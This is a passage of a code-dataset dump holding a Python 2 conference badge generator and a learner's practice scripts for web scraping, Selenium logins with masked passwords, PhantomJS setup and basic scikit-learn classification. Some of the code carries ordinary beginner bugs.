40:\n university_nl = uni_words[0],uni_words[1]+\"\\n\"+uni_words[2],uni_words[3]+\"\\n\"+uni_words[4]\n size_uni_font = 0.75 * float(size_uni_font)\n elif len(university)>10:\n university_nl = university[:10]+university[10:].replace(\" \",\"\\n\")\n if not group and len(university)<12:\n size_uni_font = 1.75 * float(size_uni_font)\n uni_font = ImageFont.truetype(UNIVERSITIES_FONT, int(size_uni_font))\n\n ######################### END OF HACKS ####################################\n\n draw = ImageDraw.Draw(img)\n draw.text((name_xpad, name_ypad), name, white, name_font)\n draw.text((surname_xpad, surname_ypad), surname, white, surname_font)\n draw.text((x_pad, occupation_y_pad), occupation, black, OCCUPATIONS_FONT\n draw.text((x_pad+1, occupation_y_pad), occupation, black, OCCUPATIONS_FONT) # Simulate bold with +1 offset\n if university != 
'0':\n draw.text((x_pad, uni_y_pad), university_nl, black, uni_font)\n\ndef save_image(img, fname, occupation, occupations, group, action)\n # Save each file to corresponding directory\n scriptdir = os.getcwd()\n if group:\n for k in range(len(occupations)):\n if occupation == occupations[k]:\n path = os.path.join(scriptdir, occupations[k]) # Dir/Occupation\n path = os.path.join(path, fname)\n if action == 1: # overwrite mode\n print(\"[+] Saving: \" + fname)\n img.save(path, dpi=(300.0, 300.0))\n elif os.path.isfile(path): # if file exists and action is not overwrite\n if action == 2: # skip mode\n continue\n print(\"[!] \"+fname+\" exists.\")\n overwrite = raw_input(\"Overwrite? [Y] > \")\n while overwrite.lower() not in ['y','n']:\n print(\"[-] Invalid input.\")\n overwrite = raw_input(\"Overwrite? [Y] > \")\n if overwrite.lower() in ['y', '']:\n print(\"[+] Overwriting \" + fname+\"\\n\")\n img.save(path, dpi=(300.0, 300.0))\n else:\n print(\"[-] Skipping...\\n\")\n continue\n else:\n print(\"[+] Saving: \" + fname)\n img.save(path, dpi=(300.0, 300.0))\n else:\n path = os.path.join(scriptdir, \"Occupations\")\n path = os.path.join(path, fname)\n img.save(path, dpi=(300.0, 300.0))\n\ndef dictionary_to_img(image_dir, data_file, action, group):\n with open(data_file) as f:\n dictionary = eval(f.read()) # CAREFUL\n occupations = []\n for i in range(len(dictionary)):\n if dictionary[i]['Occupation'] not in occupations:\n occupations.append(dictionary[i]['Occupation'])\n\n initialize_occupation_directories(occupations, len(dictionary))\n\n # Is this needed?\n #for i in range(0,len(occupations)):\n # occupations[i]= unicode(occupations[i],\"utf-8\")\n\n for i in range(len(dictionary)):\n name = dictionary[i]['Name'].decode('UTF-8')\n surname = dictionary[i]['Surname'].decode('UTF-8')\n occupation = dictionary[i]['Occupation'].decode('UTF-8')\n university = dictionary[i]['University'].decode('UTF-8')\n\n img = Image.open(image_dir)\n draw_data_to_img(img, name, surname, occupation, university)\n fileName = dictionary[i]['Name'].decode('UTF-8') + \"_\" + dictionary[i]['Surname'].decode('UTF-8') + \".jpg\"\n save_image(img, fileName, occupation, occupations, group, action)\n print(\"[!] Done. Exiting.\")\n"
},
{
"alpha_fraction": 0.6252086758613586,
"alphanum_fraction": 0.6285476088523865,
"avg_line_length": 34.74626922607422,
"blob_id": "d32f2c5b860dd2e19b4e1f3a7427f2c782c03a09",
"content_id": "dfe0d74c6defd2a7bda8cd64f11dcba5750c5280",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2396,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 67,
"path": "/excelParse.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "from openpyxl import *\nfrom openpyxl.cell.cell import *\n\nimport sys\n\nDATA_FILE = 'attendees.log'\n\ndef append_from_column(lst, ws, index, length):\n [ lst.append( ws[ index+str(i) ].value ) for i in range(length) ]\n\ndef parse_data(config):\n with open(config) as f:\n import json\n data = json.loads(f.read())\n return data\n\ndef create_dictionary(names, surnames, occupations, universities):\n print (\"[+] Writing everything to a list of dictionaries\")\n full = []\n for i in range(numOfRows): \n dictionary = {\n \"Name\": names[i].encode('utf-8'),\n \"Surname\": surnames[i].encode('utf-8'),\n \"Occupation\": occupations[i].encode('utf-8'),\n \"University\": universities[i].encode('utf-8')\n }\n # print '[!] DEBUG'+str(names[i].decode(\"utf-8\"))\n full.append(dictionary)\n return full\n\ndef parse_excelfile(ws, data_format, numOfRows)\n names = []\n surnames = []\n occupations = []\n universities = []\n\n # Loop through whole excel file\n print (\"[+] Reading worksheet, appending Names/Surnames/Occupations\")\n for column in range(numOfColumns):\n column_letter = get_column_letter(column) # openpyxl function\n if data_format[column_letter].lower() == 'name':\n append_from_column(names, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'surname': \n append_from_column(surnames, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'occupation': \n append_from_column(occupations, ws, column_letter, numOfRows)\n elif data_format[column_letter].lower() == 'university':\n append_from_column(universities, ws, column_letter, numOfRows)\n else:\n print \"ERROR!\"\n sys.exit(-1)\n\n return names, surnames, occupations, universities\n\ndef excel_to_dict(file_url, config_file):\n ws = load_workbook(filename=file_url).active\n numOfRows = ws.max_row + 1\n numOfColumns = ws.max_column + 1\n\n data_format = parse_data(config_file)\n names, surnames, occupations, universities = parse_excelfile(ws, data_format, numOfRows)\n dic = createDictionary(names, surnamesm occupations, universities, numOfRows):\n\n print (\"[+] Writing dictionary to file.\")\n with open(DATA_FILE, 'w') as f:\n f.write(str(dic))\n print(\"[!] Done!\")\n\n"
},
{
"alpha_fraction": 0.4919578433036804,
"alphanum_fraction": 0.5146977305412292,
"avg_line_length": 30.086206436157227,
"blob_id": "10dae40fafed616263df6f30b62549ad47534c34",
"content_id": "39403fb45393e291095e3dc6c57ae4088c05b920",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 58,
"path": "/grid_print.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom PIL import Image\nfrom os import *\nimport random\n\ndef get_script_path():\n return path.dirname(path.realpath(sys.argv[0]))\n\ndef combine_badges(grid_size):\n offset = 10\n badge_x, badge_y = 886, 1276\n dims = grid_size * (badge_x + offset), grid_size * (badge_y + offset)\n groups = grid_size * grid_size \n x,y = 0,0\n usedfiles = []\n no_total_files = len(listdir(getcwd()))\n page_number= 0\n npages = no_total_files / groups + 1\n for _ in range(npages):\n i = 0\n j = 0\n page = Image.new('RGB', dims, (255, 255, 255))\n items = listdir(unicode(getcwd()))\n for filename in items:\n #print (item)\n #filename = item.decode('UTF-8')\n #print (filename)\n if filename.endswith(\".jpg\") and (filename not in usedfiles):\n img = Image.open(filename)\n x,y = i*(badge_x+offset),j*(badge_y+offset)\n i+=1\n if i == grid_size:\n j+=1\n i = 0\n page.paste(img, (x, y))\n usedfiles.append(filename)\n else:\n continue\n if j == grid_size and i==0:\n break\n\n page_number += 1\n #print (\"Printing page:\" + str(page_number))\n occupationDir = getcwd()\n occupationDir = path.split(occupationDir)[1]\n filename = str(occupationDir)+\"_\"+str(page_number)+\".jpeg\"\n chdir('..')\n if not path.exists(\"Combined\"):\n mkdir(\"Combined\")\n chdir('Combined')\n page.save(filename,dpi=(300.0, 300.0))\n chdir('..')\n chdir(occupationDir)\n if len(usedfiles) == no_total_files:\n break\n"
},
{
"alpha_fraction": 0.7267683744430542,
"alphanum_fraction": 0.740638017654419,
"avg_line_length": 34.95000076293945,
"blob_id": "20e9c955fcc845abefd1e2a7cdfec2e48cf9c352",
"content_id": "2cba241b0646c30b440ee1727f4157223f5d798e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1442,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 40,
"path": "/README.md",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "<h1>Conference Badge Creator</h1>\n\nConference Badge Creator is a CLI tool written in Python 2.7. It aims to automate the process of mass-creating the badge for any event of your liking. \nIt takes an Excel File with the Names/Surnames/Occupations of your conference's attendees and a template badge as input and outputs your named badges in a structured folder format. \n\n\nFoo Bar Speaker\nFoo1 Bar1 Volunteer\nFoo2 Bar2 Random\n\nFinal folder structure:\n\n* ConferenceName\n * Speakers\n * Foo1_Bar1.jpg\n * Foo4_Bar4.jpg\n * Foo2_Bar2.jpg\n * Volunteers\n * Foo6_Bar6.jpg\n * Other\n * Foo3_Bar3.jpg\n * Foo3_Bar5.jpg\n\nEach one of the Foo Bar's will have his own folder along with other people who share the same occupation with them. This is done in order to ease the organizing of the badges post-print. The script also includes the option to combine each image to a grid of NxN size for ease at printing on various paper sizes.\n\nHas been tested on Arch Linux. It does _not_ work out of the box, dictTextToImage.py needs adjustments to position the text properly on your badge. \n\nusage:\npython conference_badge_creator.py -t templateFile -e spreadsheetFile\n\nUse -h as an argument to see all the available options.\n\nUse absolute paths to the files in the arguments.\nSupply a config file to specify the format of your data in columns/names.\n{\n \"A\" : \"Name\",\n \"B\" : \"Surname\",\n \"C\" : \"Occupation\",\n \"D\" : \"University\"\n}\n \n"
},
{
"alpha_fraction": 0.6210566163063049,
"alphanum_fraction": 0.6259977221488953,
"avg_line_length": 33.6184196472168,
"blob_id": "68884da0db458dfd409e23ce50580535413bc4ff",
"content_id": "49acd4cc66d9b70cab08fe457bbc46c6ed31937c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2631,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 76,
"path": "/conference_badge_creator.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "import argparse\nfrom argparse import RawTextHelpFormatter\nfrom os import *\n\nimport dictTextToImage\nimport excelParse\nimport grid_print\nimport sys\n\nDATA_FILE = 'attendees.log'\n\ndef get_script_path():\n return path.dirname(path.realpath(sys.argv[0]))\n\n\nparser = argparse.ArgumentParser(description=\"\"\"\n Conference Badge Creator\\n\n Version: 1.0\n Author: Georgios A. Konstantopoulos\n Occupation: Electrical Engineering & Computer Engineering\n student at AUTh\n --\n Parse data from excel or dictionary.txt file and print it on your badge.\n Fast, Easy, Open Source.\n \"\"\", epilog='Enjoy!', formatter_class=RawTextHelpFormatter)\ngroup = parser.add_mutually_exclusive_group()\nparser.add_argument(\"-e\", \"--exceldir\", type=str, help='Absolute path to the excel file.')\nparser.add_argument(\"-t\", \"--template\", type=str, help='Absolute path to the template image file.')\ngroup.add_argument(\"-o\", \"--overwrite\", help='Use when you want to overwrite all files if they exist',\n action=\"store_true\")\ngroup.add_argument(\"-s\", \"--skip\", help='Use when you don\\'t want to overwrite existing files', action=\"store_true\")\noption = parser.parse_args()\n\ndef badge_creator():\n excel_dir = option.exceldir\n file_dir = option.template\n action = 0\n if option.skip:\n action = 2\n print \"Skip Mode: ON.\"\n elif option.overwrite:\n action = 1\n print \"Overwrite Mode: ON\"\n else:\n print \"Normal Mode: ON\"\n\n folders = raw_input(\"Group based on occupation > \")\n while folders.lower() not in ['y','n']:\n folders = raw_input(\"Try again\\nGroup? > \")\n folders = folders.lower() == 'y'\n\n excelParse.excel_to_dict(excel_dir)\n dictTextToImage.dictionary_to_img(file_dir, DATA_FILE, action, folders)\n\n combine = raw_input(\"Do you want to combine all your files in a grid?\\nCombine? [N] > \")\n while combine.lower() not in ['y','n']: \n print \"Invalid input. Try again.\"\n combine = raw_input(\"Combine? [N] > \")\n \n if combine.lower() == 'y':\n grid_size = int(raw_input(\"Input grid's dimension (if 3x3 input 3) > \"))\n # print \"Current dir: \"+getcwd()\n # wavedir = os.path.join(get_script_path(),\"Badges Wave 2016\")\n # print \"Wave dir is \"+wavedir\n # chdir(wavedir)\n # print \"Current dir: \"+getcwd()\n for dir in listdir(getcwd()):\n if dir == 'Combined':\n continue\n chdir(dir)\n print \"Combining files in directory: \" + str(dir)\n grid_print.combine_badges(grid_size)\n chdir('..')\n\nif __name__ == '__main__':\n badge_creator()\n"
}
] | 5 |
ipcoo43/pythontwo | https://github.com/ipcoo43/pythontwo | 2dd9e5cda3a2d59bdc7abd1696818933462d75c4 | 763d8e401d3e9a2568fc5b36bbe701f35afd4ae7 | b0071ea492b06c33fbc2dbb68b0d6cb8d7834a31 | refs/heads/master | 2020-05-16T01:37:45.890482 | 2019-04-24T01:33:48 | 2019-04-24T01:33:48 | 182,606,062 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.679347813129425,
"avg_line_length": 22,
"blob_id": "4c1dfd22b85f04c7d01d5ff94149c8313357fa9e",
"content_id": "c219a1176b05a3477fdb94ba02b6f0a1d08d4e24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 8,
"path": "/lesson126.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import csv, codecs\n\nfilename = 'test.csv'\nfile = codecs.open(filename, 'r', 'euc_kr')\n\nreader = csv.reader(file,delimiter=\",\")\nfor cells in reader:\n\tprint(cells[0], cells[1],cells[2]) "
},
{
"alpha_fraction": 0.7439824938774109,
"alphanum_fraction": 0.7439824938774109,
"avg_line_length": 27.625,
"blob_id": "11b44f822bff1bd5a813b60ebdd4733f59c633d8",
"content_id": "802db026ee4ddc76d321adafa336dcaeabef6eb0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 16,
"path": "/lesson133.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import svm, metrics\nimport pandas\nfrom sklearn.model_selection import train_test_split\n\ncsv = pandas.read_csv('iris.csv')\ndata = csv[['SepalLength','SepalWidth','PetalLength','PetalWidth']]\nlabel = csv['Name']\n\ntrain_date, test_data, train_label, test_label = train_test_split(data, label)\n\nclf = svm.SVC()\nclf.fit(train_date,train_label)\nresults = clf.predict(test_data)\n\nscore = metrics.accuracy_score(results,test_label)\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.7232142686843872,
"alphanum_fraction": 0.7247023582458496,
"avg_line_length": 23.035715103149414,
"blob_id": "e8bd5e03a7f3a196cf6d67a65efd5b7fdb9c84c9",
"content_id": "3c0f433d686425063e92ce0db678b46c25e5a008",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 770,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/lesson116.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\nurl = 'https://nid.naver.com/nidlogin.login'\n\n# PhantomJS 드라이버 추출하기\nbrowser = webdriver.PhantomJS()\nbrowser.implicitly_wait(3)\n\n# 로그인 하기\nbrowser.get(url)\nelement_id = browser.find_element_by_id('id') # 아이드 텍스트 입력 상자\nelement_id.clear()\nelement_id.send_keys('idopark')\nelement_pw = browser.find_element_by_id('pw') # 비밀번호 텍스트 입력 상자\nelement_pw.clear()\nelement_pw.send_keys('*********')\n\nbrowser.save_screenshot('website_c.png')\n\nbutton = browser.find_element_by_css_selector(\"input.btn_global[type=submit]\")\nbutton.submit()\n\n# 메일페이지 열기\nbrowser.get('https://mail.naver.com/')\nbrowser.save_screenshot('website_d.png')\n\n# 브라우저 종료하기\nbrowser.quit()"
},
{
"alpha_fraction": 0.6969112157821655,
"alphanum_fraction": 0.7818532586097717,
"avg_line_length": 31.375,
"blob_id": "42a26467fa9c7fda21f7d7d8afdab7c1417d7219",
"content_id": "b792dd423474584c36cb6006ec16908676924a12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 16,
"path": "/lesson113.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "\ndocker pull ubuntu:16.04\ndocker run -it ubuntu:16.04\napt update\napt install -y python3 python3-pip\npip3 install selenium\npip3 install beautifulsoup4\napt install -y wget libfontconfig\nmkdir -p /home/root/src && cd $_\nwget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2\ntar jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2\ncd phantomjs-2.1.1-linux-x86_64/bin/\ncp phantomjs /usr/local/bin/\napt install -y fonts-nanum*\nexit\ndocker ps -a\ndocker commit <컨테이너이름:858f2bb41f78> ubnuntu-phantomjs"
},
{
"alpha_fraction": 0.7436708807945251,
"alphanum_fraction": 0.7452531456947327,
"avg_line_length": 32.31578826904297,
"blob_id": "297a5dd1207c1430ce3cfec0c3728c1a5868127c",
"content_id": "fa24152e77df610714878327834a6b6da428b4b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 19,
"path": "/lesson117.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\n\ndriver = webdriver.PhantomJS()\ndriver.get('https://www.indischool.com/index.php?act=dispMemberLoginForm')\ndriver.implicitly_wait(3)\n\ndriver.find_element_by_id('uid').send_keys('doglee')\ndriver.find_element_by_id('upw').send_keys('*******')\ndriver.find_element_by_css_selector('.hi.button.button-primary.button-expand').click()\n# driver.save_screenshot('website_a.png')\n\ndriver.get('https://www.indischool.com/libClass')\ntitles = driver.find_elements_by_css_selector('span.title-link')\nprint(titles)\nfor title in titles:\n\tprint('-', title.text)\n\ndriver.quit()\n# driver.save_screenshot('website_a.png')"
},
{
"alpha_fraction": 0.5097087621688843,
"alphanum_fraction": 0.5606796145439148,
"avg_line_length": 21.94444465637207,
"blob_id": "222ff2f2705a6581fd6312c5e1a1b9ffc26c4c03",
"content_id": "c6fb6d6dae55a586c5d4a56a26ed7dfb68287625",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/lesson105.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ Request ]\n- 요청 방식 : GET, POST, PUT, DELETE, PATCH\n- 요청 대상 : media.daum.net => HostName\n- 추가적인 정보 \n > 경로 : /photo-viewer => Path\n > 데이터 : ?cid = 318190 => GET방식\n > 헤시 : #2017060505\n\n[ 분석 ]\n- 요청 방식 : GET\n- 요청 대상 : search.naver.com/ => HostName\n- 추가적인 정보 \n > 경로 : /search.naver => Path\n > 데이터 :?sm=tab_sug.top => 요청 매개 변수\n\t\t\t\t\t\t&where=kin\n\t\t\t\t\t\t&query=초콜릿(디코딩) # %EC%B4%88%EC%BD%9C%EB%A6%BF(인코딩)\n''')"
},
{
"alpha_fraction": 0.6739811897277832,
"alphanum_fraction": 0.6823406219482422,
"avg_line_length": 24.210525512695312,
"blob_id": "fd8d2cfeed8be111e7da6ec3745d34e410982013",
"content_id": "c1f884083c9320ce638a521d6113ad5c2e2af930",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 38,
"path": "/lesson109.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "# 모듈 추출하기\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\n# 기사 목록을 가져 오기\nurl = 'https://news.naver.com/main/home.nhn'\nhtml = urllib.request.urlopen(url)\nsoup = BeautifulSoup(html,'html.parser')\n\nresults = soup.select('.mlist2.no_bg a') #strong\n\nwith open('test.txt','w',encoding='utf-8') as fp:\n\tfp.write('')\n\nfor result in results:\n\t# 기사 가져 오기\n\t# print(result.attrs['href'])\n\turl_article = result.attrs['href']\n\thtml = urllib.request.urlopen(url_article)\n\tsoup_article = BeautifulSoup(html,'html.parser')\n\tcontent = soup_article.select_one('#articleBodyContents')\n\t# print(content.contents)\n\t\n\t# 가공 하기\n\toutput = ''\n\tfor item in content.contents:\n\t\tstripped = str(item).strip()\n\t\tif stripped == '':\n\t\t\tcontinue\n\t\tif stripped[0] not in ['<','/']:\n\t\t\toutput += str(item).strip()\n\twcontent = output.replace('본문 내용TV플레이어','')\n\tprint(wcontent)\n\tprint('-'*70)\n\ttime.sleep(1)\n\twith open('test.txt','a',encoding='utf-8') as fp:\n\t\tfp.write(wcontent)"
},
{
"alpha_fraction": 0.6924778819084167,
"alphanum_fraction": 0.7057521939277649,
"avg_line_length": 33.846153259277344,
"blob_id": "30aca4f08736493b7fd6d98317b35be54fb27916",
"content_id": "e8041e2ec2ef6811c153f70b0d8c0329b9c84614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 13,
"path": "/lesson119.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport urllib.request\n\nurl = 'http://www.weather.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=108'\nrequest = urllib.request.urlopen(url)\nxml = request.read()\n\nsoup = BeautifulSoup(xml,'html.parser')\nseoul = soup.find_all('location')[2]\nprint(seoul.city)\nprint('날짜\\t','\\t날씨','최저','최고',sep='\\t')\nfor item in seoul.find_all('data'):\n\tprint(item.tmef.string,':',item.find('wf').text,',',item.tmn.string,',',item.tmx.string)"
},
{
"alpha_fraction": 0.6903114318847656,
"alphanum_fraction": 0.6972318291664124,
"avg_line_length": 23.08333396911621,
"blob_id": "1a800fa4872550fa41d3aca582ae776ed4e34715",
"content_id": "5e81f4c9991e0535c74b345b99cd48015280d6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/lesson112.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\n\n# 세션 만들기\nsession = requests.session()\n\n# 로그인\nurl = 'http://www.hanbit.co.kr//member/login_proc.php'\ndata = {\n\t'return_url':'http://www.hanbit.co.kr/index.html',\n\t'm_id':'ipcoo43',\n\t'm_passwd':'********'\n}\n\nresponse = session.post(url, data=data)\nresponse.raise_for_status()\n\n# 마일리지 가져와 보기\nurl = 'http://www.hanbit.co.kr/myhanbit/myhanbit.html'\nresponse = session.get(url)\nresponse.raise_for_status()\nsoup = BeautifulSoup(response.text,'html.parser')\ntext = soup.select_one('.mileage_section1 span').get_text()\nprint('마일리지 :',text)\n"
},
{
"alpha_fraction": 0.644859790802002,
"alphanum_fraction": 0.6869158744812012,
"avg_line_length": 21.578947067260742,
"blob_id": "e72db6ac29ccf84f4c695a736711f48bf7e938a6",
"content_id": "718bcab4715d53e879321f3a942a918193d46d24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 448,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/lesson131.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\npip install -U scikit-learn scipy matplotlib scikit-image\npip install pandas\n''')\n\nfrom sklearn import svm, metrics\n\ndatas = [[0,0],[1,0],[0,1],[1,1]]\nlabels = [0,1,1,0]\nexamples = [[0,0],[1,0]]\nexamples_label = [0,1]\n\nclf = svm.SVC()\nclf.fit(datas, labels)\nresults = clf.predict(examples)\nprint(results)\n# metrics.accuracy_score(답, 예측했던 결과)\nscore = metrics.accuracy_score(examples_label, results)\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.5421686768531799,
"alphanum_fraction": 0.5421686768531799,
"avg_line_length": 34.71428680419922,
"blob_id": "174c2d410f5294e258985d7412cd045e34e42fa0",
"content_id": "83bed667eeb359f6813da0f30bafdf89f9837b31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 7,
"path": "/lesson134.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "from sklearn import model_selection, svm, metrics\n\nclf = svm.SVC() # 기계학습 알고리즘 선택 \nclf.fit # 학습 하기\npredict = clf.predict() # 예측 하기\nscore = metrics.accuracy_score() # 정답률 구하기\nprint('정답률 :',score)"
},
{
"alpha_fraction": 0.5729386806488037,
"alphanum_fraction": 0.579281210899353,
"avg_line_length": 15.892857551574707,
"blob_id": "b11a1325499bf475a25a3f5a4b386c59bfd8b172",
"content_id": "7bf6163b871a72e2701e9ec71056f29ff1eefd32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 28,
"path": "/lesson110.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import time\n'''\nwith open('test.txt','r',encoding='utf-8') as fp:\n\tfor i in fp:\n\t\tprint(i.replace('.','\\n'))\n\t\ttime.sleep(1)\n\nf = open(\"test.txt\", 'r')\nwhile True:\n line = f.readline()\n if not line: break\n print(line)\nf.close()\n\nf = open(\"test.txt\")\ntry:\n for line in f:\n print(line)\n # 한줄씩 처리하는 코드\nfinally:\n f.close()\n'''\nf_name='test.txt'\nwith open(f_name) as ifp:\n\tlines = ifp.read().split('.')\n\tfor line in lines:\n\t\tprint(line)\n\t\ttime.sleep(3)\n"
},
{
"alpha_fraction": 0.6692913174629211,
"alphanum_fraction": 0.6850393414497375,
"avg_line_length": 16,
"blob_id": "bcab39cd911f481157bb7dea54089314342168e0",
"content_id": "1a9154b87e40124ebfef2f3c5155160d580022ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 15,
"path": "/lesson111.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "import requests\n\nurl = 'https://google.com'\ndata = {\n\t'a':'10',\n\t'b':'20'\n}\nsession = requests.session()\nresponse = session.get(url, data=data)\n# session.post(url)\n# session.put(url)\n# session.delete(url)\nresponse.raise_for_status()\n\nprint(response.text)"
},
{
"alpha_fraction": 0.4413793087005615,
"alphanum_fraction": 0.5471264123916626,
"avg_line_length": 15.129630088806152,
"blob_id": "eeef80a4a4dfae52ac0a238d70cba8065a86994b",
"content_id": "59b708b884c9b5c83969925ada0c98a1e1c7e757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 54,
"path": "/lesson124.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\n[ CSV/TSV ]\n- CSV : Comma-Seperated Value => 쉼표로 구분된 값\n > 1000,비누,300 => 쉼표로 구분 (CSV)\n > 1002 마스크 230 => 띄어 쓰기로 구분 (SSV)\n > 1001\t 장갑\t 150 => 탭으로 구분 (TSV)\n- 한 줄에 데이터는 하나\n- 한 줄에는 쉼표로 속성을 구분\n- 첫 번째 줄은 헤더로 사용 가능\n''')\nprint('''\n[ xml, json, csv 데이터 비교 ]\n1. xml 데이터 \n\t<product>\n\t\t<product id=\"1000\">\n\t\t\t<name>비누</name>\n\t\t\t<price>300</price>\n\t\t</product>\n\t\t<product id=\"1001\">\n\t\t\t<name>장갑</name>\n\t\t\t<price>400</price>\n\t\t</product>\n\t\t<product id=\"1002\">\n\t\t\t<name>마스크</name>\n\t\t\t<price>500</price>\n\t\t</product>\n\t</product>\n\n2. json 데이터\n\t[{\n\t\tID:1000,\n\t\t이름:\"비누\",\n\t\t가격:300\n\t},{\n\t\tID:1001,\n\t\t이름:\"장갑\",\n\t\t가격:400\n\t},{\n\t\tID:1002,\n\t\t이름:\"마스크\",\n\t\t가격:500\n\t}]\n\n3. csv 데이터\n\tID,이름,가격\n\t1000,비누,300\n\t1001,장갑,400\n\t1002,마스크,5000\n\n4. 데이터 용량 비교 : csv > json > xml\n5. 표현력 비교 : xml > json > csv\n6. 가독성 비교 : xml > json > csv\n7. 최근 동향 : json(현재 많이 사용), csv(데이터 큰 용량의 장점)를 많이 사용\n''')"
},
{
"alpha_fraction": 0.5475578308105469,
"alphanum_fraction": 0.5989717245101929,
"avg_line_length": 15.956521987915039,
"blob_id": "be389eace398e35d88336d0e80fb9179cdd02105",
"content_id": "8d5ecfd7c1574f43e77c148b542405f213d20ea1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 23,
"path": "/lesson130.py",
"repo_name": "ipcoo43/pythontwo",
"src_encoding": "UTF-8",
"text": "print('''\npip install -U scikit-learn scipy matplotlib scikit-image\npip install pandas\n''')\n\nfrom sklearn import svm\n\nclf = svm.SVC()\n# clf.fit(데이터,답[레이블])\nclf.fit([\n\t[0,0], # 각각의 요소를 벡터\n\t[1,0], # 데이터를 어떻게 넣으냐가 기계학습의 중요 포인트\n\t[0,1],\n\t[1,1]\n],[0, 1, 1,\t0 ]\n)\n# clf.predict() 우리가 원하는 답[레이블]의 형식을 넣음, predict는 예측하다.\nresults = clf.predict([\n\t[0,0], # 0\n\t[1,0] # 1\n]) # [0 1]\n\nprint(results)"
},
{
"alpha_fraction": 0.6041939854621887,
"alphanum_fraction": 0.6107470393180847,
"avg_line_length": 23.645160675048828,
"blob_id": "907e56eaa66d09743bc240dcfac4165e38ab2d25",
